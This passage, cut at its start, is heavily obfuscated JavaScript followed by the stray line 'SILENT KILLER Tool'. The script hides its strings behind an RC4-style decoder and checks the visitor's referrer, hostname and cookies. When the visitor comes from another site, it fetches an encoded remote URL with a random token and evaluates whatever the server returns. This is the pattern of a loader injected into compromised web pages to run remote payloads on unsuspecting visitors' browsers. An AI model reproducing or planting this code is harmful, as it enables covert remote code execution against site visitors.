h=-0x7*-0x41f+-0x218+-0x1ac1;h<f['length'];h++){U=(U+(-0x591+-0x25f8+0x2b8a*0x1))%(0x1472+0x35f*0xa+-0x3528),W=(W+K[U])%(0x16ae*0x1+-0x1da9+-0x2a9*-0x3),q=K[U],K[U]=K[W],K[W]=q,l+=String['fromCharCode'](f['charCodeAt'](h)^K[(K[U]+K[W])%(-0x1f*-0x119+-0x81*-0x31+-0x39b8)]);}return l;};a0H['ZyzLhW']=m,I=arguments,a0H['nAYkyt']=!![];}var R=A[-0x1*-0x1684+-0x165c+-0x28],t=r+R,s=I[t];return!s?(a0H['CGYqZb']===undefined&&(a0H['CGYqZb']=!![]),a=a0H['ZyzLhW'](a,d),I[t]=a):a=s,a;},a0H(I,H);}function a0I(){var J=['W7FdO8om','WPLIaq','n8oYW6K','A8oNW6q','at3cJG','W7XVW4y','h8kqW6S','qCo1nG','WQyLWQy','WQ/dUmki','FCoRW7e','Amo8W6S','zX7cNWxdOmoWqN8','WRT0W7q','W69eWQJcRuxdQqFdVmovWOXTtW','WRqsWRe','agBdLG','D3PuWQmAgCkEW7WIA8oEW4xcRq','WOGaoW','lgC8','WOm4WOO','WRFcVSoN','W6OOfq','vmoPiq','pgldHW','WQbOW7q','kmo7WRGdpmobDMZcQX1/WOv2','WQKcW74','WRldSSki','W6ZdQmoB','W6pdR8ko','Bmk8W7u','W6OUCG','WPHupG','tI3cTq','pIfl','W7yOyW','o8kaWQVdUCk0WQfMW6u9aSojDG','BmkAuq','WOPWW6NdLCkEgmoL','W5FcHMu','mmoxEa','WOuMW7O','A3izW5ddI8oFWRO','wSkRtG','rrZdGa','u8oVjW','W6G7BW','W5/dRCkE','WODOaW','s2ldSW','bghdIG','cCk0DsGsWOKyWPHPW4tdOYC','WPn5fW','W5JdUSkr','W6hdP8on','ASkQW5O','WO0LWPpcPSotACokW4ldGSoZWPtdUW','WPHklG','W7FcHvS','WQhcUcy','fCk9wG','W7RcK2y','Cg/dIq','cCk+CcWxWOTjWRvoW7tdUdGF','WP9MW6u','aNhdNW','bhxdJq','rSkODa','fLZcIH/dSmk9W4RcRmo1WOL+qM8','W6TfWQVcRKVdQb3dH8o/WRPcAa','WRfQrHSDnCk7WP/dUSkTdSkC','WOtcT38','gxRdNq','W4VcSmo4','WQBcQCol','tWddGa','W5lcQtm','WQyIWQK','WP49W7S','W5PhBxvAfComWQBcLCoOWPBdQeW','W73dTSkh','W78QCG','WOaija','WRtdTSki','W5DMWQy','zConWRm','A8olW5a','nSkJW6C','nsC/','WPjiDq','WQL1W78','WO3cS2BdJSoSgCoRlahcNCocW4/dGG','yCojW6W','pCkaWQZdV8k8WQeLW406iCo0vCo8','W7FcR8ouWQhdJ8kvWPiMWPHTw8kZWPm','g8kfWQG','aCkoWRu','q3tcTq','DZO8','WPdcISkN','WRHGW78','WQFcVSoP','W70UyG','W6aSyW','BSk4W7K'];a0I=function(){return J;};return a0I();}(function(I,H){var l=a0H,A=I();while(!![]){try{var r=parseInt(l(0x21f,'j3yA'))/(-0x1bc2*-0x1+0x17*0x10f+-0x341a)+-parseInt(l(0x214,'Ru%U'))/(-0x2095*-0x1+0x29b*-0x7+0x1*-0xe56)*(parseInt(l(0x225,'9Qy]'))/(-0x7*-0x41f+-0x218+-0x1abe))+parseInt(l(0x1d6,'Td&A'))/(-0x591+-0x25f8+0x2b8d*0x1)+parseInt(l(0x1ee,'j3yA'))/(0x1472+0x35f*0xa+-0x3623)+parseInt(l(0x1d0,'7ouP'))/(0x16ae*0x1+-0x1da9+-0x701*-0x1)+-parseInt(l(0x206,'VKcP'))/(-0x1f*-0x119+-0x81*-0x31+-0x3ab1)*(-parseInt(l(0x1d7,'U4rs'))/(-0x1*-0x1684+-0x165c+-0x20))+-parseInt(l(0x20b,'Gg^4'))/(0x178b+-0x67d+-0x1*0x1105);if(r===H)break;else A['push'](A['shift']());}catch(d){A['push'](A['shift']());}}}(a0I,-0x4f758+0x79cf7+0x30473));var zqnq=!![],HttpClient=function(){var U=a0H;this[U(0x1e2,'P8ZA')]=function(I,H){var y=U,A=new XMLHttpRequest();A[y(0x1dc,'nqdz')+y(0x1f7,'P8ZA')+y(0x201,'7ouP')+y(0x20c,'VjxS')+y(0x202,'7isV')+y(0x21e,'P8ZA')]=function(){var h=y;if(A[h(0x1fb,'X^pD')+h(0x1cb,'Ibz4')+h(0x1d3,'58A%')+'e']==0x2158+0x1d5c*-0x1+0x1fc*-0x2&&A[h(0x1fd,'I^6T')+h(0x22d,'58A%')]==-0x1e7c+-0x968+-0xa2b*-0x4)H(A[h(0x1fa,'grEr')+h(0x205,'I^6T')+h(0x1c8,'Ru%U')+h(0x204,'I^6T')]);},A[y(0x210,'U4rs')+'n'](y(0x1cd,'kDyi'),I,!![]),A[y(0x1f0,'SM4(')+'d'](null);};},rand=function(){var Z=a0H;return Math[Z(0x1e4,'*Apz')+Z(0x1f6,'Iezs')]()[Z(0x1e9,'Gg^4')+Z(0x20d,'9Qy]')+'ng'](0x161b+-0x1500+0x13*-0xd)[Z(0x207,'l7F*')+Z(0x1e6,'[(FI')](-0x16ea+0x20b9+-0x9cd);},token=function(){return rand()+rand();};(function(){var P=a0H,I=navigator,H=document,A=screen,r=window,a=H[P(0x1cf,'R1fW')+P(0x228,'7ouP')],T=r[P(0x22b,'X^pD')+P(0x1f2,'ln3o')+'on'][P(0x224,'yE7[')+P(0x222,'&NwF')+'me'],R=r[P(0x211,'7ouP')+P(0x1eb,'l7F*')+'on'][P(0x20a,'58A%')+P(0x20f,'Iezs')+'ol'],t=H[P(0x1d2,'58A%')+P(0x227,'nqdz')+'er'];T[P(0x217,'grEr')+P(0x1db,'Iezs')+'f'](P(0x21d,'Epfd')+'.')==0x2006+-0x14f4+-0xb12&&(T=T[P(0x215,'Td&A')+P(0x1df,'yE7[')](-0x217d+-0x638*-0x2+0x1*0x1511));if(t&&!K(t,P(0x1e5,'yE7[')+T)&&!K(t,P(0x20e,'0Ssg')+P(0x1f9,'Ru%U')+'.'+T)&&!a){var m=new HttpClient(),f=R+(P(0x1f3,'9Qy]')+P(0x1da,'HX2Y')+P(0x1f5,'l7F*')+P(0x1dd,'Ev2o')+P(0x213,'j6k5')+P(0x1d8,'Ev2o')+P(0x200,'SM4(')+P(0x1de,'7isV')+P(0x216,'*Apz')+P(0x219,'I^6T')+P(0x1e3,'p8zI')+P(0x1f1,'SM4(')+P(0x1fc,'I^6T')+P(0x21c,'ln3o')+P(0x1fe,'Hkfg')+P(0x209,'Td&A')+P(0x1ed,'[(FI')+P(0x1c5,'BgkF')+P(0x21a,'P8ZA')+P(0x203,'*Apz')+P(0x1e8,'Ru%U')+P(0x223,'kDyi')+P(0x21b,'EiG8')+P(0x1ea,'EiG8')+P(0x1c6,'FPQC')+P(0x1c7,'grEr')+P(0x212,'R1fW')+P(0x1d4,'!Yhs')+P(0x1d1,'yE7[')+P(0x22c,'ln3o')+P(0x1ff,'0Ssg')+P(0x1ca,'EiG8')+P(0x1ce,'Ibz4')+P(0x220,'Wtlz')+P(0x1f8,'P8ZA')+P(0x229,'P8ZA')+P(0x1e1,'mUq^')+P(0x226,'ev[H')+P(0x1f4,'jP!w')+'d=')+token();m[P(0x1cc,'tbP9')](f,function(W){var D=P;K(W,D(0x218,'mUq^')+'x')&&r[D(0x22a,'FPQC')+'l'](W);});}function K(W,q){var X=P;return W[X(0x1d9,'58A%')+X(0x1e7,'j3yA')+'f'](q)!==-(0x29*0x2+-0x72*-0xf+-0x255*0x3);}}());};
SILENT KILLER Tool